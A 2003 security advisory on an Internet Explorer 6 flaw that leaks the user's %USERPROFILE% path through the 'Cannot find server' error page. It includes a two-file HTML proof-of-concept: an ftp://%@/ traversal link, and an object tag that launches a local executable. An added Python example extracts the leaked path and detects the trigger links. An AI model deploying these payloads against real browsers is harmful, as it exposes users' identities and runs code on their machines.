Title:

Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability

Date:

5 June 2003

Author:

Eiji James Yoshida [ptrs-ejy@bp.iij4u.or.jp]
penetration technique research site [Advisories]

Vulnerable:

Windows2000 SP3 Internet Explorer 6.0 SP1

Bugtraq ID:

7826

Overview:

Through this vulnerability, a remote attacker can learn the path of the victim's %USERPROFILE% folder without having to guess the target's user name.

e.g. %USERPROFILE% = "C:\Documents and Settings\victim"

Details:

The vulnerability lies in the address of the "Cannot find server" error page.
The address of that page is

"res://C:\WINNT\System32\shdoclc.dll/dnserror.htm#file://C:\Documents and Settings\%USERNAME%\Desktop\ftp:\\%@\".

The file:// fragment of this address contains the path of the current user's Desktop folder, and therefore the path of %USERPROFILE%.

Exploit code:

**************************************************
This exploit loads %TEMP%\exploit.html, which you must create yourself.
Then open ftpexp.html and click on the "Exploit" link.
**************************************************

[exploit.html]
<html>
<script>setTimeout(function(){document.body.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111"  codebase="file://c:/winnt/notepad.exe"></object>'}, 0);</script>
</html>

[ftpexp.html]
<html>
<a href="ftp://%@/../../../../Local Settings/Temp/exploit.html" TYPE="text/html" target="_blank">Exploit</a>
</html>
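As an added example (not code from the advisory or its author), the following Python recovers the disclosed %USERPROFILE% path from an error-page address of the form shown under Details, and flags the ftp://%@/ link pattern used by ftpexp.html so such content can be reviewed; the function names and sample strings are this example's own, constructed from the advisory.

```python
"""Added example, not part of the advisory: recover the %USERPROFILE% path
from a dnserror.htm address of the form shown under Details, and flag the
ftp://%@/ link pattern used by ftpexp.html.  Names and samples are assumed."""
import re
from typing import List, Optional

# Constructed from the advisory, with a concrete user name for %USERNAME%.
SAMPLE_ADDRESS = (
    r"res://C:\WINNT\System32\shdoclc.dll/dnserror.htm"
    r"#file://C:\Documents and Settings\victim\Desktop\ftp:\\%@" + "\\"
)

# Constructed trigger page mirroring ftpexp.html in the advisory.
SAMPLE_HTML = ('<a href="ftp://%@/../../../../Local Settings/Temp/exploit.html"'
               ' TYPE="text/html" target="_blank">Exploit</a>')

# An ftp:// link whose host is the literal "%@", as used by the trigger page.
TRIGGER_RE = re.compile(r'href\s*=\s*["\']?(ftp://%@/[^"\'>]*)', re.IGNORECASE)


def userprofile_from_error_address(address: str) -> Optional[str]:
    """Return %USERPROFILE% embedded in a "Cannot find server" page address.

    The part after '#' is a file:// path resolved relative to the user's
    Desktop folder, so everything before '\\Desktop\\' is %USERPROFILE%.
    Returns None if the address carries no such file:// fragment.
    """
    if "#" not in address:
        return None
    fragment = address.split("#", 1)[1]
    if not fragment.lower().startswith("file://"):
        return None
    local_path = fragment[len("file://"):]
    match = re.search(r"^(.*?)\\desktop(\\|$)", local_path, re.IGNORECASE)
    return match.group(1) if match else None


def username_from_userprofile(userprofile: str) -> str:
    """Last component of %USERPROFILE%, i.e. the Windows user name."""
    return userprofile.rstrip("\\").rsplit("\\", 1)[-1]


def find_trigger_links(html: str) -> List[str]:
    """Return every ftp://%@/ href in an HTML document for review."""
    return [m.group(1) for m in TRIGGER_RE.finditer(html)]


if __name__ == "__main__":
    profile = userprofile_from_error_address(SAMPLE_ADDRESS)
    print(profile, username_from_userprofile(profile))
    print(find_trigger_links(SAMPLE_HTML))
```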

Workaround:

None.

Vendor status:

Microsoft was notified on 7 November 2002.
A patch to fix this bug will be released in the future.

Similar vulnerability:

Microsoft Windows Server 2003 "Shell Folders" Directory Traversal Vulnerability

Copyright (c) 2003 Eiji James Yoshida. All rights reserved.